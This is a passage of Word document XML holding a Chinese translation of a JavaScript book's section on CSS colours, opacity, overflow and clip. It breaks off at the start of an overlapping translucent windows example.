    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="411" w:name="16_2_5_Yan_Se___Tou_Ming_Du_He_Ban_Tou_M"/>
      <w:r>
        <w:t>16.2.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　颜色、透明度和半透明度</w:t>
      </w:r>
      <w:bookmarkEnd w:id="411"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>color</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定文档元素包含的文本的颜色，并可以用</w:t>
      </w:r>
      <w:r>
        <w:t>background-color</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定任何元素的背景颜色。早些时候，我们看到可以用</w:t>
      </w:r>
      <w:r>
        <w:t>border-color</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>border</w:t>
      </w:r>
      <w:r>
        <w:t>复合属性指定元素边框的颜色。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>针对边框的讨论包含一些例子，使用常见颜色的英文名字（如</w:t>
      </w:r>
      <w:r>
        <w:t>"red"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"black"</w:t>
      </w:r>
      <w:r>
        <w:t>）来直</w:t>
      </w:r>
      <w:r>
        <w:t>接指定边框的颜色。</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>支持若干英文颜色名字，但是在</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>中更一般的指定颜色的语法是使用十六进制数分别指定组成颜色的红、绿和蓝色分量，每个分量可以使用一位或两位数字。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#000000/*</w:t>
      </w:r>
      <w:r>
        <w:t>黑色</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#fff/*</w:t>
      </w:r>
      <w:r>
        <w:t>白色</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#f00/*</w:t>
      </w:r>
      <w:r>
        <w:t>亮红色</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#404080/*</w:t>
      </w:r>
      <w:r>
        <w:t>黑暗不饱和蓝色</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#ccc/*</w:t>
      </w:r>
      <w:r>
        <w:t>浅灰色</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>也为指定</w:t>
      </w:r>
      <w:r>
        <w:t>RGBA</w:t>
      </w:r>
      <w:r>
        <w:t>色彩空间（红、绿、蓝色值加上指定颜色透明度的</w:t>
      </w:r>
      <w:r>
        <w:t>alpha</w:t>
      </w:r>
      <w:r>
        <w:t>值）中的颜色定义了语法。所有现代的浏览器（除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>）都支持</w:t>
      </w:r>
      <w:r>
        <w:t>RGBA</w:t>
      </w:r>
      <w:r>
        <w:t>，期待在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 9</w:t>
      </w:r>
      <w:r>
        <w:t>中也能支持。</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>也定义了对</w:t>
      </w:r>
      <w:r>
        <w:t>HSL</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>色相</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>饱和度</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>值）和</w:t>
      </w:r>
      <w:r>
        <w:t>HSLA</w:t>
      </w:r>
      <w:r>
        <w:t>颜色规范的支持。它们在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>中都支持，除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>允许指定元素确切的位置、尺寸、背景颜色和边框颜色，因为能绘制矩形和（当减少高度和宽度时）水平、垂直线条它有了基本的图形能力。本书上一版本包含了一个利用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>图形的柱状图例子，但在本书中它被＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素扩展的属性所替代。（参见第</w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t>章更多关于脚本化客户端图形的内容。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>除了</w:t>
      </w:r>
      <w:r>
        <w:t>background-color</w:t>
      </w:r>
      <w:r>
        <w:t>属性，也可以为元素指定背景图像。</w:t>
      </w:r>
      <w:r>
        <w:t>background-image</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定使用的图</w:t>
      </w:r>
      <w:r>
        <w:t>像，</w:t>
      </w:r>
      <w:r>
        <w:t>background-attachment</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>background-position</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>background-repeat</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定如何绘制该图像的一些高级细节。复合属性</w:t>
      </w:r>
      <w:r>
        <w:t>background</w:t>
      </w:r>
      <w:r>
        <w:t>允许一起指定这些属性值。利用这些背景图像属性可以创建有趣的视觉效果，介绍它们超出了本书的范围。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果没有为元素指定背景颜色或图像，它的背景通常透明，理解这点非常重要。例如，如果一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞绝对定位在常规文档流中一些已存在的文本上方，默认情况下，文本将透过＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素显示出来。如果＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞同时包含了自己的文本，字母将重</w:t>
      </w:r>
      <w:r>
        <w:t>叠在一起而变得模糊不清。尽管如此，默认情况下不是所有的元素都是透明的。例如，具有透明背景的表单元素看起来不透明，并且元素（如＜</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>＞）有默认的背景颜色。用</w:t>
      </w:r>
      <w:r>
        <w:t>background-color</w:t>
      </w:r>
      <w:r>
        <w:t>属性可以覆盖默认颜色，如果强烈要求可以将其显式设置为</w:t>
      </w:r>
      <w:r>
        <w:t>"transparent"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>到目前为止所讨论的透明度其实是非此即彼的：元素的背景不是全透明就是全不透明的。指定元素（内容的前景和背景）为半透明也是可能的（示例见图</w:t>
      </w:r>
      <w:r>
        <w:t>16-3</w:t>
      </w:r>
      <w:r>
        <w:t>）。用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>opacity</w:t>
      </w:r>
      <w:r>
        <w:t>属性来处理，该属性值是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>之间的数字，</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>代表</w:t>
      </w:r>
      <w:r>
        <w:t>100%</w:t>
      </w:r>
      <w:r>
        <w:t>不透明（默</w:t>
      </w:r>
      <w:r>
        <w:t>认值），而</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>代</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:t>0%</w:t>
      </w:r>
      <w:r>
        <w:t>不透明（或</w:t>
      </w:r>
      <w:r>
        <w:t>100%</w:t>
      </w:r>
      <w:r>
        <w:t>透明）。</w:t>
      </w:r>
      <w:r>
        <w:t>opacity</w:t>
      </w:r>
      <w:r>
        <w:t>属性在当今所有浏览器中都支持，除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>提供类似的可选方式：</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>特有的</w:t>
      </w:r>
      <w:r>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:t>属性。让元素</w:t>
      </w:r>
      <w:r>
        <w:t>75%</w:t>
      </w:r>
      <w:r>
        <w:t>不透明，可以使用以下</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>opacity:.75;/*</w:t>
      </w:r>
      <w:r>
        <w:t>透明度，</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>标准属性</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>filter:alpha(opacity=75);/*IE</w:t>
      </w:r>
      <w:r>
        <w:t>透明度，注意没有小数点</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="412" w:name="16_2_6_Bu_Fen_Ke_Jian__overflowHe_clip"/>
      <w:r>
        <w:t>16.2.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　部分可见：</w:t>
      </w:r>
      <w:r>
        <w:t>overflow</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clip</w:t>
      </w:r>
      <w:bookmarkEnd w:id="412"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>visibility</w:t>
      </w:r>
      <w:r>
        <w:t>属性可以让文档元素完全隐藏，而</w:t>
      </w:r>
      <w:r>
        <w:t>overflow</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clip</w:t>
      </w:r>
      <w:r>
        <w:t>属性允许只显示元素的一部分。</w:t>
      </w:r>
      <w:r>
        <w:t>overf</w:t>
      </w:r>
      <w:r>
        <w:t>low</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定内容超出元素的大小（例如，用</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>样式属性指定）时该如何显示。该属性允许的值和含义如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>visible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>默认值。如果需要，内容可以溢出并绘制在元素的边框的外面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>hidden</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>裁剪掉和隐藏溢出的内容，即在元素尺寸和定位属性值定义的区域外不会绘制内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>scroll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>元素一直显示水平和垂直滚动条。如果内容超出元素尺寸，允许用户通过滚动来查看额外的内容。此属性值负责文档在计算机屏幕中的显示，例如，打印纸质文档时滚动条是没有意义的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>auto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>滚动条只在内容超出元素尺寸时显示，而非一直显示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>overflow</w:t>
      </w:r>
      <w:r>
        <w:t>属性允许指定当内容超出元素边框时该如何显示，而</w:t>
      </w:r>
      <w:r>
        <w:t>clip</w:t>
      </w:r>
      <w:r>
        <w:t>属性确切地指定了应该显示元素的哪个部分，它不管元素是否溢出。在创建元素渐进显示的脚本效果时候该属性特别有用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>clip</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值指定了元素的裁剪区域。在</w:t>
      </w:r>
      <w:r>
        <w:t>CSS2</w:t>
      </w:r>
      <w:r>
        <w:t>中，裁剪区域是矩形的，不过</w:t>
      </w:r>
      <w:r>
        <w:t>clip</w:t>
      </w:r>
      <w:r>
        <w:t>属性的语法预留了开放的可能，该标准将来的版本将支持除了矩形以外其他形状的裁剪。</w:t>
      </w:r>
      <w:r>
        <w:t>clip</w:t>
      </w:r>
      <w:r>
        <w:t>属性的语法是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>rect(top right bottom left)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>相对于元素边框的左上角，</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>rig</w:t>
      </w:r>
      <w:r>
        <w:t>ht</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>bottom</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>left 4</w:t>
      </w:r>
      <w:r>
        <w:t>个值指定了裁剪矩形的边界。例如，要只显示元素的</w:t>
      </w:r>
      <w:r>
        <w:t>100×100</w:t>
      </w:r>
      <w:r>
        <w:t>像素大小部分，可以赋予该元素</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>style="clip:rect(0px 100px 100px 0px);"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，圆括号中的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个值是长度，所以</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>必须</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>包含明确的单位，如</w:t>
      </w:r>
      <w:r>
        <w:t>p x</w:t>
      </w:r>
      <w:r>
        <w:t>代表像素。不允许使用百分比。可以指定负值，让裁剪区域超出为元素指定的边框尺寸。也可以为任何</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个值使用</w:t>
      </w:r>
      <w:r>
        <w:t>auto</w:t>
      </w:r>
      <w:r>
        <w:t>关键字来指定裁剪区域的边缘就是元素边框的对应边缘。例如，用</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定只显示元素最左边的</w:t>
      </w:r>
      <w:r>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:t>像素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>sty</w:t>
      </w:r>
      <w:r>
        <w:t>le="clip:rect(auto 100px auto auto);"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，值之间没有逗号，裁剪区域从上边缘开始顺时针设置。将</w:t>
      </w:r>
      <w:r>
        <w:t>clip</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>auto</w:t>
      </w:r>
      <w:r>
        <w:t>来停用裁剪功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="413" w:name="16_2_7_Shi_Li__Zhong_Die_Ban_Tou_Ming_Ch"/>
      <w:r>
        <w:t>16.2.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　示例：重叠半透明窗口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="413"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本节用一个展示很多讨论过的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性的例子来结束。例</w:t>
      </w:r>
      <w:r>
        <w:t>16-2</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>在浏览器窗口中创建滚动、重叠和半透明的视觉效果。视觉效果如图</w:t>
      </w:r>
      <w:r>
        <w:t>16-3</w:t>
      </w:r>
      <w:r>
        <w:t>所示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251694080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4067354" cy="2674188"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="35" name="00035.jpeg" descr="000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00035.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4067354" cy="2674188"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>16-3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>创建的窗口</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>例子代码不包含</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码和事件处理程序，因此无法和窗口进行交互（除了可以滚动它们），但是足以证明</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>可以达到的强大效果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>16-2</w:t>
      </w:r>
      <w:r>
        <w:t>：用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>显示窗口</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head</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
